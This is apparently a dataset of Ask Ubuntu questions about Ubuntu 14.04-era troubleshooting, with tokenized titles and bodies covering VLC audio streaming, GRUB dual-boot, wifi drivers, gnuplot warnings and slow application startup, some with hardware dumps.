470286	streaming with vlc - no audio	i 'm trying to stream audio and video using vlc using the following command : vlc -vvv v4l2 : // : v4l2-dev=/dev/video0 : v4l2-width=640 : v4l2-height=480 : input-slave= '' alsa : //hw:1,0 '' : v4l2-standard=0 -- sout= '' # transcode { vcodec=h264 , vb=800 , scale=1 , acodec=mp4a , ab=128 , channels=2 , samplerate=44100 } : rtp { sdp=rtsp : //:8080/live.ts } '' -i dummy but i always get an error that vlc can not open the alsa device . this error also occurs intermittently when i use the gui 's `` open capture device '' is there something i 'm doing wrong , and how can i open the alsa device more reliably ?
470287	is there a way to recover even some files from a windows partition which has been replaced with ubuntu 14.04	i was using windows and when i tried to install ubuntu alongside with windows it accidently replaced windows and i lost all my ntfs partitions . but using testdisk i could retrieve my partitions except the one which was replaced with ubuntu is there a way to recover even some files from the windows partition which has been replaced with ubuntu 14.04
470292	libreoffice : bubble text suggestion wo n't go away	in libreoffice writer i get word suggestions in a text bubble . i have switched off `` tips '' in tools/options/libreoffice/general . what can i do to remove this very annoying bubble text ? in the screen shot the bubble is gray , on my screen is almost black . the specific word is in dutch .
470293	can i continue booting into ubuntu if i move my drive to another laptop ?	i installed ubuntu on an ssd on one laptop , but just purchased a new laptop . will i be able to put the ssd in the new laptop and still boot fine , or is the install hardware dependent ? i know with windows i had trouble doing this before .
470295	install the libidn.so.11 library for 32-bits in a 64-bit system	with 13.04 i installed ia32-libs to pick up dependencies for a specific 32-bit application that i use . there is no ia32-libs for 14.04 . i need one library , libidn.so.11 . here 's my summary : first ... me @ myw510 : ~/opt/fs/bin $ ./slvoice ./slvoice : error while loading shared libraries : libz.so.1 : can not open shared object file : no such file or directory i installed lib32z1 using synaptic , and this was resolved . next ... me @ myw510 : ~/opt/fs/bin $ ./slvoice ./slvoice : error while loading shared libraries : libidn.so.11 : can not open shared object file : no such file or directory i 'm pretty sure this will be the last lib i need . what should i install ? do i need to add a repository ?
470298	how to configure gnubiff with aol mail in thunderbird , ubuntu 14.04	as a newcomer to ubuntu ( from windows xp ) , i may be overlooking the obvious . i get my aol e-mail successfully in thunderbird ( ubuntu 14.04 ) . when i tried to set up gnubiff , i seem to configure it incorrectly and can not make it work .
470299	java windows open up off-screen ( multi monitor setup with ubuntu 14.04 )	i 'm on ubuntu 14.04 ( 64 bit ) with java 1.7.0_55 ( openjdk-7-jdk : amd64 , openjdk-7-jre : amd64 ) . most gui java applications start without any errors or warnings and their icon shows up in the launcher , but their windows are nowhere to be seen . this is because they are being placed off screen ( about 1 monitor width ) to the right of the primary monitor . i 've got two monitors , the right one being the primary one . some applications are not only being placed off screen , they are also weirdly sized . geogebra , for example , has the full height but is only a few pixels in width . using alt+f7 and the arrow keys allows me to move the windows into the viewable area , but once i quit the programs and run them again , they will appear off-screen again and i have to do the procedure again . i found a bug report about java windows being misplaced , but it does n't sound like my problem exactly . this stackoverflow question does sound like my problem but only workarounds ( the one i came up with myself ) are being suggested . i wonder if i should file an additonal bug report via launchpad or just add to the existing one ? also , is there a way to tell ubuntu to remember the java window 's last position , so i do n't have to move them in-screen by hand every single time ? that would be an okay-ish workaround for the time being . i updated the question 's text and title to reflect my newest findings .
470300	ca n't type accents in uppercase letters in chrome	i 'm using kubuntu 14.04 with the latest chrome ( version 35.0.1916.114 ) and while inside any chrome window i ca n't really type accented uppercase letters . so , for instance , these é á ã ó ò are perfectly fine . but these á é à ó ã i had to type in a libreoffice window and paste here . i really do n't know what is going on and would really appreciate any help =/
470301	problem : gnome-do and launchy wrongly open a text file with one application or another depending on the file size	the same text file is opened with my default text editor or firefox depending upon the content of the file . for example , let 's say i have a file `` textfile.txt '' if i add 878 lines of text , the file will be opened with firefox if i add 72 lines of text , the file will be opened with my default text editor ( leafpad ) . i want to open all of them with my default text editor . note 1 : if i remove firefox , nothing is opened ( a terminal is opened and closed quickly . i do n't have time to read its content ) . note 2 : the default file browser ( pcmanfm ) always opens the text file with the default text editor no matter its size ( leafpad ) . note 3 : i firstly thought it was a bug of launchy , so i posted it here . after installing gnome-do , i realized it was a general issue . update 1 : full content of ~/.local/share/applications/mimeapps.list [ added associations ] inode/symlink=pcmanfm.desktop ; application/pdf=mupdf.desktop ; application/x-bzip-compressed-tar=synaptic.desktop ; inode/blockdevice=pcmanfm.desktop ; image/jpeg=xnview.desktop ; [ default applications ] inode/symlink=pcmanfm.desktop application/pdf=mupdf.desktop image/jpeg=xnview.desktop
470304	ubuntu 14.04 how to downgrade networkmanager or fix my problem	yes hello i am using lubuntu 14.04 and i am having a problem with it i cant connect to wifi unless it was already configured but if i click on an open one like ones at mc donalds or starbucks it wont connect it just says no networks in range i would like to down grade my version to the one in ubuntu 13.10 or any other version that works so much better
470305	ubuntu 14.04 display problem when starting the system	i just installed ubuntu weeks ago on my laptop toshiba satellite p845t-s4310 , and it works good , thing is that i always use it with a secondary monitor , and it seems to bring me some issues . when i started the computer without the secondary monitor , the laptop screen just blink and then shut down , so i 'm not able to see anything on my laptop screen , until i connect my secondary monitor and play with the display settings , and some times the laptop screen does not comes back , and i have to work within the secondary monitor . when the computer is sleeping and i try to wake it up , i have the same issue only the secondary monitor wakes up , but the laptop screen just blink showing the desktop and then shut down again . i like ubuntu but i can not take my laptop out with me to any place , since when i start it the screen shuts down and i need a external monitor to connect and turn the lap screen on . i think the only time the laptop screen works fine was after the installation process after the first restart . hope you guys have some recommendations to solve this issue . regards .
470306	how to disable hp envy light sensor auto-dimming	i swapped my windows os for ubuntu a couple of months ago . i had no idea hp envy came with this annoying feature described here ... http : //forum.notebookreview.com/hp-envy-hdx/515979-envy-15-random-screen-dimming.html but ... i have no idea how to toggle the sensor now that i do n't have windows installed .
470307	how to make grub2 boot another drive mbr ?	my laptop ( dell vostro 3350 ) have two hard drives : main one ( /dev/sda ) , is a ssd mounted on sata-hdd slot with ubuntu14.04 ( grub2 installed to this mbr ) . installed on normaly hd bay second on ( /dev/sdb ) , stock hd ( with recovery partition etc etc ) moved to sata-odd slot in place of dvd drive with an adapter i can not figure out how to boot windows from grub2 . in the past i remember that ( maybe with grub1 ) i can point to second disk mbr and then windows boots normally . so my config is : disk /dev/sda : 128.0 gb , 128035676160 bytes 255 testine , 63 settori/tracce , 15566 cilindri , totale 250069680 settori unità = settori di 1 * 512 = 512 byte sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes identificativo disco : 0x0007d87d dispositivo boot start end blocks id system /dev/sda1 * 2048 175781887 87889920 83 linux /dev/sda2 175783934 250068991 37142529 5 esteso /dev/sda5 175783936 246163455 35189760 83 linux /dev/sda6 246165504 250068991 1951744 82 linux swap / solaris disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 testine , 63 settori/tracce , 60801 cilindri , totale 976773168 settori unità = settori di 1 * 512 = 512 byte sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes identificativo disco : 0xb3e7a9bf dispositivo boot start end blocks id system /dev/sdb1 2048 206847 102400 de dell utility /dev/sdb2 206848 30926847 15360000 7 hpfs/ntfs/exfat /dev/sdb3 * 30926848 167600175 68336664 7 hpfs/ntfs/exfat /dev/sdb4 167604160 976768064 404581952+ f w95 esteso ( lba ) /dev/sdb5 167606208 976768064 404580928+ 7 hpfs/ntfs/exfat here is my /boot/grub/grub.cfg section of os-prober menuentry 'windows 7 ( loader ) ( su /dev/sdb2 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-cc70378a703779f2 ' { insmod part_msdos insmod ntfs set root='hd1 , msdos2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd1 , msdos2 -- hint-efi=hd1 , msdos2 -- hint-baremetal=ahci1 , msdos2 cc70378a703779f2 else search -- no-floppy -- fs-uuid -- set=root cc70378a703779f2 fi parttool $ { root } hidden- chainloader +1 } menuentry 'windows 7 ( loader ) ( su /dev/sdb3 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-ac7c4ec27c4e86d4 ' { insmod part_msdos insmod ntfs set root='hd1 , msdos3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd1 , msdos3 -- hint-efi=hd1 , msdos3 -- hint-baremetal=ahci1 , msdos3 ac7c4ec27c4e86d4 else search -- no-floppy -- fs-uuid -- set=root ac7c4ec27c4e86d4 fi parttool $ { root } hidden- chainloader +1 } both give me this message if i selected them on boot menu : error : no such device : cc70378a703779f2 ( or ac7c4ec27c4e86d4 ) error : hd1 can not get c/h/s values http : //i.stack.imgur.com/hve3k.jpg last , but not the least , from my bios i can not change hard drive boot priority so there 's no way to boot /dev/sdb first . edit : this is my blkid /dev/sda1 : uuid= '' 1597fe18-faf5-48a5-b80f-4cbb7f8b896e '' type= '' ext4 '' /dev/sda5 : uuid= '' ea6548f1-3004-49ff-8d1d-4c84dfed3a6a '' type= '' ext4 '' /dev/sda6 : uuid= '' e24dbc3b-d2da-4a63-97ce-7430cfce9fce '' type= '' swap '' /dev/sdb1 : sec_type= '' msdos '' label= '' dellutility '' uuid= '' 3030-3030 '' type= '' vfat '' /dev/sdb2 : label= '' recovery '' uuid= '' cc70378a703779f2 '' type= '' ntfs '' /dev/sdb3 : label= '' os '' uuid= '' ac7c4ec27c4e86d4 '' type= '' ntfs '' /dev/sdb5 : label= '' vostrohd '' uuid= '' 01ccbb70e50a71e0 '' type= '' ntfs '' edit : i ran bootinfo script . here the result edit2 : pc configuration at top
470309	what size of dvd-rw do i need ?	what size of dvd-rw do i need to put the iso image for the latest ubuntu . i have tried dvd-r but it still does not work .
470316	automatically booting ubuntu from new ssd rather than windows on old hdd ?	so i got ubuntu working . problem is if i keep both my ssd and hdd drive connected to the motherboard , windows automatically starts up completely disregarding ubuntu . at the moment , i 'd like both oss present for testing . i could n't install two oss on my new ssd because i do n't have the installation cd for windows . how can i set ubuntu as default boot up and is there a way to choose between the two hard drives what os to use on powering up the computer ?
470318	replacing xp with lubuntu : how do i get my wireless to work ?	experience level with lui : total noob netbook : acer one , intel atom with win xp , 32-bit hi all , i 've searched and searched but finally i 'm stuck at this point . maybe the answer is in another forum but it seems there are always very specific things that are sliiiightly different that mine . there are a couple weird things during installation that are n't usually mentioned in most of the tutorials.. i 'll mention it in case it 's relevant . it 's quite possible this is just the noob in me speaking.. anyways : after installing lubuntu desktop and rebooting the first time , i was prompted to select either win xp or lubuntu during startup , so of course i selected lubuntu . but it went back to windows desktop . i tried rebooting a couple times , then on one i hit f12 to give me the option again and after selecting lubuntu a second time , it loaded/installed . but , during that initial install , the message `` serious errors were found while checking the disk drive for / . '' displayed . so , finally i tracked down this discussion ubuntu 14.04 not booting after error message . /temp could not be mounted after which i changed `` ro '' to `` rw '' ( despite the top saying something slightly different that gun grub2.. i ca n't remember exactly but i suspect it 's related to mine being lubuntu , and that topic being ubuntu ) . anyway , it worked and loaded to the ubuntu desktop ( ! ! ! ) . i 've never had it hardwired into a network , only ever using it with wifi from what i can remember - i want to maintain the netbook 's ability to auto detect any wifi networks , as i plan to use this when i 'm in hostels , traveling , etc . just something simple . so far , when i go to menu > preferences > network connections , the only option is ethernet ... the closest fix i 've found is here https : //answers.launchpad.net/ubuntu/+source/gnome-nettool/+question/218406 so , i entered sudo lshw -c network -numeric ; lsb_release -rcd ; uname -r ; lspci -nnk | grep -ia2 net ; lsusb ; rfkill list all ; dmesg | egrep 'error|irmware|net|wlan' which gives me : *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] vendor : realtek semiconductor co. , ltd. [ 10ec ] physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 02 serial : 00:23:8b:99:5c : b3 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:44 ioport:3000 ( size=256 ) memory:71010000-71010fff memory:71000000-7100ffff memory:71020000-7103ffff *-network description : wireless interface product : ar242x / ar542x wireless network adapter ( pci-express ) [ 168c:1c ] vendor : qualcomm atheros [ 168c ] physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 00:24:2c:09 : e8 : f3 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath5k driverversion=3.13.0-24-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bg resources : irq:18 memory:75200000-7520ffff description : ubuntu 14.04 lts release : 14.04 codename : trusty 3.13.0-24-generic 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 02 ) subsystem : acer incorporated [ ali ] device [ 1025:015b ] kernel driver in use : r8169 03:00.0 ethernet controller [ 0200 ] : qualcomm atheros ar242x / ar542x wireless network adapter ( pci-express ) [ 168c:001c ] ( rev 01 ) subsystem : foxconn international , inc. device [ 105b : e008 ] kernel driver in use : ath5k bus 001 device 002 : id 0c45:62c0 microdia sonix usb 2.0 camera bus 001 device 003 : id 0781:5530 sandisk corp. cruzer bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub 0 : phy0 : wireless lan soft blocked : no hard blocked : no [ 0.105388 ] net : registered protocol family 16 [ 0.118924 ] [ firmware bug ] : acpi : bios _osi ( linux ) query ignored [ 0.201248 ] acpi : marking method _osc as serialized because of ae_already_exists error [ 0.296167 ] net : registered protocol family 2 [ 0.296858 ] net : registered protocol family 1 [ 1.321609 ] net : registered protocol family 10 [ 1.322222 ] net : registered protocol family 17 [ 18.667596 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 22.330173 ] net : registered protocol family 31 [ 29.905484 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 29.907200 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 29.928574 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 29.930249 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready ... annnnnd now i 'm stuck here . maybe i should 've chosen a desktop that was n't `` so '' light because now i have to figure out everything ( clock , wifi , icons , etc etc ) . any suggestions would be appreciated . also , if there is anything in the above copied/pasted text that i should avoid showing in public , can someone please advise out of the kindness of their heart ? thanks !
470319	gnuplot error while calchep process	i dont know if this is the wright place to ask but school 's server gave the error below while doing a process in calchep batch mode . its obviously about gnuplot but i have no idea since i didnt touched program 's code . set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option` set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 x000000 xadd8e6 xadd8e6 x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option set term png transparent medium xffffff x000000 ^ '' gnuplot_instructions '' , line 1 : warning : deprecated color option $
470324	how to move all windows to another workspace	is is possible to move all windows ( or all not minimized windows ) form one workspace to another ? i know i can move one window to other workspace with shift+ctrl+alt+arrow , but it will move only that one focused window .
470328	re-enter cisco vpn passwords	since i upgraded from lubuntu 13.10 to 14.04 my vpn passwords have to be re-entered every time i open the vpn connection . the passwords used to be maintained by the key ring but no longer . when i create a new configuration using cisco compatible vpn ( vpnc ) it looks like it is storing the passwords in the keyring . a popup appears and asks for my password . any body any ideas ?
470329	slow performance while opening applications	i moved from win 8.1 64bit to ubuntu 14.04 64 bit with a fresh install from dvd . everything is moving slow with performance . graphics is fair , but when i say performance i mean , an average to open any application , i can count to 10 mississippi before it loads i.e . firefox , libreoffice , chrome , etc . system tools take roughly 5 seconds . login takes about 25 seconds . boot time is great at about less than 20 seconds . any ideas ? here is my configuration : description : desktop computer product : ms-7253 ( ) vendor : micro-star international co. , ltd version : 1.0 width : 64 bits capabilities : smbios-2.4 dmi-2.4 vsyscall32 configuration : boot=normal chassis=desktop discrete graphics : nvidia gt218 [ geforce 210 ] core motherboard product : ms-7253 vendor : micro-star international co. , ltd physical id : 0 version : 1.0 *-firmware description : bios vendor : phoenix technologies , ltd physical id : 0 version : v1.8 date : 03/06/2008 size : 128kib capacity : 448kib capabilities : isa pci pnp apm upgrade shadowing cdboot bootselect socketedrom edd int13floppy360 int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer int10video acpi usb agp ls120boot zipboot biosbootspecification *-cpu description : cpu product : amd athlon ( tm ) 64 x2 dual core processor 4200+ vendor : advanced micro devices [ amd ] physical id : 7 bus info : cpu @ 0 version : amd athlon ( tm ) 64 x2 dual core processor 4200+ slot : socket am2 size : 2200mhz capacity : 3ghz width : 64 bits clock : 200mhz capabilities : fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt rdtscp x86-64 3dnowext 3dnow rep_good nopl extd_apicid pni cx16 lahf_lm cmp_legacy svm extapic cr8_legacy *-cache:0 description : l1 cache physical id : b slot : internal cache size : 128kib capacity : 128kib capabilities : synchronous internal write-back *-cache:1 description : l2 cache physical id : c slot : external cache size : 512kib capacity : 512kib capabilities : synchronous internal write-back *-memory description : system memory physical id : 19 slot : system board or motherboard size : 2gib *-bank:0 description : dimm product : none vendor : none physical id : 0 serial : none slot : a0 size : 1gib width : 64 bits *-bank:1 description : dimm product : none vendor : none physical id : 1 serial : none slot : a1 size : 1gib width : 64 bits *-pci:0 description : host bridge product : k8m890ce host bridge vendor : via technologies , inc. physical id : 100 bus info : pci @ 0000:00:00.0 version : 00 width : 32 bits clock : 33mhz configuration : driver=agpgart-amd64 latency=8 resources : irq:0 memory:0-7ffffff *-generic unclaimed description : pic product : k8m890ce i/o apic interrupt controller vendor : via technologies , inc. physical id : 0.5 bus info : pci @ 0000:00:00.5 version : 00 width : 32 bits clock : 33mhz capabilities : io_x_-apic bus_master configuration : latency=0 *-pci:0 description : pci bridge product : vt8237/8251 pci bridge [ k8m890/k8t800/k8t890 south ] vendor : via technologies , inc. physical id : 1 bus info : pci @ 0000:00:01.0 version : 00 width : 32 bits clock : 66mhz capabilities : pci pm normal_decode bus_master cap_list resources : ioport : e000 ( size=4096 ) memory : dfc00000-dfcfffff memory : dfb00000-dfbfffff *-pci:1 description : pci bridge product : k8t890 pci to pci bridge controller vendor : via technologies , inc. physical id : 2 bus info : pci @ 0000:00:02.0 version : 00 width : 32 bits clock : 33mhz capabilities : pci pciexpress pm msi ht normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:27 ioport : d000 ( size=4096 ) memory : dd000000-deffffff ioport : b0000000 ( size=536870912 ) *-display description : vga compatible controller product : gt218 [ geforce 210 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:24 memory : dd000000-ddffffff memory : b0000000-bfffffff memory : ce000000-cfffffff ioport : df00 ( size=128 ) memory : c0000000-c007ffff *-multimedia description : audio device product : high definition audio controller vendor : nvidia corporation physical id : 0.1 bus info : pci @ 0000:02:00.1 version : a1 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:25 memory : deffc000-deffffff *-pci:2 description : pci bridge product : k8t890 pci to pci bridge controller vendor : via technologies , inc. physical id : 3 bus info : pci @ 0000:00:03.0 version : 00 width : 32 bits clock : 33mhz capabilities : pci pciexpress pm msi ht normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:31 ioport : c000 ( size=4096 ) memory : dfe00000-dfefffff ioport : dfd00000 ( size=1048576 ) *-ide:0 description : ide interface product : vt8237a sata 2-port controller vendor : via technologies , inc. physical id : f bus info : pci @ 0000:00:0f.0 version : 80 width : 32 bits clock : 33mhz capabilities : ide pm bus_master cap_list configuration : driver=sata_via latency=64 resources : irq:21 ioport : ff00 ( size=8 ) ioport : fe00 ( size=4 ) ioport : fd00 ( size=8 ) ioport : fc00 ( size=4 ) ioport : fb00 ( size=16 ) ioport : f400 ( size=256 ) *-ide:1 description : ide interface product : vt82c586a/b/vt82c686/a/b/vt823x/a/c pipc bus master ide vendor : via technologies , inc. physical id : f.1 bus info : pci @ 0000:00:0f.1 version : 07 width : 32 bits clock : 33mhz capabilities : ide pm bus_master cap_list configuration : driver=pata_via latency=64 resources : irq:0 ioport:1f0 ( size=8 ) ioport:3f6 ioport:170 ( size=8 ) ioport:376 ioport : fa00 ( size=16 ) *-usb:0 description : usb controller product : vt82xxxxx uhci usb 1.1 controller vendor : via technologies , inc. physical id : 10 bus info : pci @ 0000:00:10.0 version : a0 width : 32 bits clock : 33mhz capabilities : pm uhci bus_master cap_list configuration : driver=uhci_hcd latency=64 resources : irq:20 ioport : f900 ( size=32 ) *-usb:1 description : usb controller product : vt82xxxxx uhci usb 1.1 controller vendor : via technologies , inc. physical id : 10.1 bus info : pci @ 0000:00:10.1 version : a0 width : 32 bits clock : 33mhz capabilities : pm uhci bus_master cap_list configuration : driver=uhci_hcd latency=64 resources : irq:22 ioport : f800 ( size=32 ) *-usb:2 description : usb controller product : vt82xxxxx uhci usb 1.1 controller vendor : via technologies , inc. physical id : 10.2 bus info : pci @ 0000:00:10.2 version : a0 width : 32 bits clock : 33mhz capabilities : pm uhci bus_master cap_list configuration : driver=uhci_hcd latency=64 resources : irq:21 ioport : f700 ( size=32 ) *-usb:3 description : usb controller product : vt82xxxxx uhci usb 1.1 controller vendor : via technologies , inc. physical id : 10.3 bus info : pci @ 0000:00:10.3 version : a0 width : 32 bits clock : 33mhz capabilities : pm uhci bus_master cap_list configuration : driver=uhci_hcd latency=64 resources : irq:23 ioport : f600 ( size=32 ) *-usb:4 description : usb controller product : usb 2.0 vendor : via technologies , inc. physical id : 10.4 bus info : pci @ 0000:00:10.4 version : 86 width : 32 bits clock : 33mhz capabilities : pm ehci bus_master cap_list configuration : driver=ehci-pci latency=64 resources : irq:21 memory : dffff000-dffff0ff *-isa description : isa bridge product : vt8237a pci to isa bridge vendor : via technologies , inc. physical id : 11 bus info : pci @ 0000:00:11.0 version : 00 width : 32 bits clock : 33mhz capabilities : isa pm cap_list configuration : latency=0 *-network description : ethernet interface product : vt6102 [ rhine-ii ] vendor : via technologies , inc. physical id : 12 bus info : pci @ 0000:00:12.0 logical name : eth0 version : 7c serial : ea:49 : f3:0f:4c : e0 size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=via-rhine driverversion=1.5.1 duplex=half latency=64 link=no maxlatency=8 mingnt=3 multicast=yes port=mii speed=10mbit/s resources : irq:23 ioport : f200 ( size=256 ) memory : dfffe000-dfffe0ff *-pci:3 description : pci bridge product : vt8237a pci to pci bridge vendor : via technologies , inc. physical id : 13.1 bus info : pci @ 0000:00:13.1 version : 00 width : 32 bits clock : 33mhz capabilities : pci ht subtractive_decode bus_master cap_list resources : ioport : b000 ( size=4096 ) memory : dfa00000-dfafffff ioport : df900000 ( size=1048576 ) *-network description : ethernet interface product : ic plus ip100a integrated 10/100 ethernet mac + phy vendor : sundance technology inc / ic plus corp physical id : 4 bus info : pci @ 0000:04:04.0 logical name : eth1 version : 31 serial : 00:08:54 : e0:9f:78 size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sundance driverversion=1.2 duplex=full ip=192.168.0.9 latency=64 link=yes maxlatency=10 mingnt=10 multicast=yes port=mii speed=100mbit/s resources : irq:17 ioport : bf00 ( size=128 ) memory : dfaff000-dfaff1ff memory : df900000-df90ffff *-pci:1 description : host bridge product : k8m890ce host bridge vendor : via technologies , inc. physical id : 101 bus info : pci @ 0000:00:00.1 version : 00 width : 32 bits clock : 33mhz *-pci:2 description : host bridge product : k8m890ce host bridge vendor : via technologies , inc. physical id : 102 bus info : pci @ 0000:00:00.2 version : 00 width : 32 bits clock : 33mhz *-pci:3 description : host bridge product : k8m890ce host bridge vendor : via technologies , inc. physical id : 103 bus info : pci @ 0000:00:00.3 version : 00 width : 32 bits clock : 33mhz *-pci:4 description : host bridge product : k8m890ce host bridge vendor : via technologies , inc. physical id : 104 bus info : pci @ 0000:00:00.4 version : 00 width : 32 bits clock : 33mhz *-pci:5 description : host bridge product : k8m890ce host bridge vendor : via technologies , inc. physical id : 105 bus info : pci @ 0000:00:00.7 version : 00 width : 32 bits clock : 33mhz *-pci:6 description : host bridge product : vt8237/8251 ultra vlink controller vendor : via technologies , inc. physical id : 106 bus info : pci @ 0000:00:11.7 version : 00 width : 32 bits clock : 33mhz configuration : latency=64 *-pci:7 description : host bridge product : vt8237a host bridge vendor : via technologies , inc. physical id : 107 bus info : pci @ 0000:00:13.0 version : 00 width : 32 bits clock : 33mhz *-pci:8 description : host bridge product : k8 [ athlon64/opteron ] hypertransport technology configuration vendor : advanced micro devices , inc. [ amd ] physical id : 108 bus info : pci @ 0000:00:18.0 version : 00 width : 32 bits clock : 33mhz *-pci:9 description : host bridge product : k8 [ athlon64/opteron ] address map vendor : advanced micro devices , inc. [ amd ] physical id : 109 bus info : pci @ 0000:00:18.1 version : 00 width : 32 bits clock : 33mhz *-pci:10 description : host bridge product : k8 [ athlon64/opteron ] dram controller vendor : advanced micro devices , inc. [ amd ] physical id : 10a bus info : pci @ 0000:00:18.2 version : 00 width : 32 bits clock : 33mhz 